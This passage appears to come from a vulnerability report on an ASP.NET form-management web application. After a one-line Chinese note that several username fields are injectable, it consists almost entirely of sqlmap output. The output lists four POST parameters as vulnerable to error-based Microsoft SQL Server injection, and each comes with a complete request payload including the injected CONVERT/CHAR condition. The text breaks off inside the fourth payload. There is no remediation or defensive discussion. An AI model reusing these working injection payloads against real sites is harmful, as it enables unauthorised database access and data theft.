ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName、
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModifyUserName均存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8
WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnR
pdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4
OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgI
GD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8
PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaH
ku7ZkFgJmD2QWAgIDDxYCHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF
0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3VyY2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z
0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJhZGlvQnV0dG9
uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAI
CDw8WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgI
fCWVkZAIIDw8WAh8JZWRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBY
CZg9kFgICAQ9kFgICAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGR
kAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1R
hcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQUKMjAxNS0wOC0
xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hwk
FCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV
4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW
3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW
3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6Zm
kCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC
4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAI
ND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7b
pl7QS5pyA5ZCO5L+u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLf
lkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF
0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirb
mgIEgIOWAkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29
udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXI
xJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCR
Db250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCR
jdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5
jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2V
uZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5
Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiR
yYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2x
kZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFB
sYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8uNGC3+B
n5jU=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1%' AND 8752=CONVERT(INT,(SELECT CHA
R(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8752=8752) TH
EN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113
))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription
=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-
07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2
015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$s
cLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModif
yTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
CreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8
WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnR
pdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4
OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgI
GD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8
PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaH
ku7ZkFgJmD2QWAgIDDxYCHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF
0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3VyY2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z
0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJhZGlvQnV0dG9
uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAI
CDw8WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgI
fCWVkZAIIDw8WAh8JZWRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBY
CZg9kFgICAQ9kFgICAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGR
kAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1R
hcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQUKMjAxNS0wOC0
xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hwk
FCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV
4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW
3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW
3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6Zm
kCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC
4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAI
ND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7b
pl7QS5pyA5ZCO5L+u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLf
lkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF
0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirb
mgIEgIOWAkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29
udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXI
xJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCR
Db250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCR
jdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5
jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2V
uZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5
Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiR
yYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2x
kZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFB
sYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8uNGC3+B
n5jU=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2%' AND 1740=CONVERT(INT,(SELECT CHAR(113)+CHAR
(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1740=1740) THEN CHAR(49)
 ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113))) AND '%'
='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-
07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2
015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$s
cLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModif
yTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
CreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8
WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnR
pdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4
OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgI
GD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8
PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaH
ku7ZkFgJmD2QWAgIDDxYCHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF
0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3VyY2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z
0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJhZGlvQnV0dG9
uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAI
CDw8WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgI
fCWVkZAIIDw8WAh8JZWRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBY
CZg9kFgICAQ9kFgICAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGR
kAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1R
hcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQUKMjAxNS0wOC0
xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hwk
FCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV
4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW
3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW
3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6Zm
kCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC
4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAI
ND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7b
pl7QS5pyA5ZCO5L+u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLf
lkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF
0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirb
mgIEgIOWAkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29
udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXI
xJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCR
Db250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCR
jdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5
jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2V
uZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5
Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiR
yYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2x
kZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFB
sYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8uNGC3+B
n5jU=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceH
older2$ucCreateTime$scLeft=2015-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPla
ceHolder2$ucCreateTime$scRight=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$ucLastModifyTime$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlac
eHolder1$ContentPlaceHolder2$txtCreateUserName=3%' AND 4061=CONVERT(INT,(SELECT
CHAR(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4061=4061)
 THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(
113))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModifyUser
Name
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8
WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnR
pdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4
OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgI
GD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8
PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaH
ku7ZkFgJmD2QWAgIDDxYCHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF
0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3VyY2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z
0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJhZGlvQnV0dG9
uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAI
CDw8WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgI
fCWVkZAIIDw8WAh8JZWRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBY
CZg9kFgICAQ9kFgICAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGR
kAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1R
hcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQUKMjAxNS0wOC0
xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hwk
FCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV
4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW
3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW
3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6Zm
kCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC
4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAI
ND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7b
pl7QS5pyA5ZCO5L+u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLf
lkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF
